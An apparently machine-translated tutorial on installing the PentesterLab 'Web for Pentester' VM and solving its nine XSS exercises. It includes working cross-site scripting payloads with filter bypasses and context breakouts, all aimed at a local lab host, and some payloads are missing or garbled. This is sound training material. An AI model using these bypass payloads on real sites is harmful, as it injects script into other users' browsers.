"Web Security" third bomb: Web defense Platform Pentester installation and XSS part answer analysis

Web for Pentester is a penetration testing platform developed by foreign security researchers, which allows you to learn about common Web vulnerability detection techniques.

Download link and document Description:

http://pentesterlab.com/exercises/web_for_pentester/

"Installation Process"

1. Mount the image in the virtual machine. After downloading the iOS image, create a new system in the virtual machine.

All the way down, create a virtual system.

Click Start and select ISO image to start.

2. Set up the network. Turn off the system you just opened.

Click Settings and select Network Options. Set up a network

3. Start the system. Input Ifconfig

Can see that the IP address of our virtual machine is http://192.168.56.101/different systems may not be the same

If you want the host to access the virtual machine, you must have the host and the virtual machine within the same network segment.

So open the network and Sharing center on the host, set the IP

Based on my virtual machine IP, the IP I set for this machine is as follows:

4. In the host browser input virtual machine IP, I here is http://192.168.56.101/, you can access the virtual machine via HTTP!!

"XSS Partial Resolution"

XSS example1:

No filtering or coding at all, playing in various poses ~

Name=<script>alert (' BB ') </script>

XSS example2:

From here you can see, filter out the <script> tags, we try to write the case?

Name=<script>alert (' BB ') </sCript>

Well, the case is bypassed.

XSS Example3:

As in the previous picture, the,<script> tag was filtered out.

Try Name=la<script>la first, output Hello,lala

Name=<scri<script>pt>alert (' BB ') </scri</script>pt>

Tested this can be used in instance 2.

XSS example4:

First enter the most basic test name=<script>alert (' BB ') </script>

Unexpectedly output Error!

A different label? NAME=: No error this time. Complement full complement ~

Name=

Success ~ ~ Tested this payload in the first three should also be possible

XSS example5:

Enter name= normal display first

Complement name= Output error

The alert was found to be filtered out--but other functions could be used,

For example name=

Checked the documentation and found it could be written like this.

Name=

This world is so magical.

XSS Example6:

Look at the element and discover that the output is in the script tag.

$a = " '

If the output is in the script label, close the double quotation marks first.

NAME=FDF "; alert ($a);//

XSS Example7:

Review elements:

<script>
var $a = ' fdf&quot;; alert ($a);//';
</script>

I found the double quotes were htmlencode.

--also found $a= ' this place into single quotes ... Change it a little bit.

NAME=FDF '; alert ($a);//

Become a

XSS Example8:

Yo, finally grow, become a storage type of ~

Randomly output a name <script>alert (' a ') </script>

Review elements

HELLO &lt;script&gt;alert (' a ') &lt;/script&gt;

<> has been htmlencode.

Such filtering is sufficient for the output of the content in HTML. So where's the loophole?

A reminder of the answer--we find that the target URL of the form table can be constructed

Http://192.168.56.101/xss/example8.php/%22%20onsubmit=%22alert (' 1 ')

The pop-up window will be triggered at the time of submission

XSS Example9:

--The last one, are you kidding me?

Review elements

<script>
document.write (location.hash.substring (1));
</script>

Just change it for the better. Http://192.168.56.101/xss/example9.php#<script>alert (' 1 ') </script>

Note: Official answer address: http://files.pentesterlab.com/web_for_pentester/web_for_pentester.pdf

"Web Security" third bomb: Web defense Platform Pentester installation and XSS part answer analysis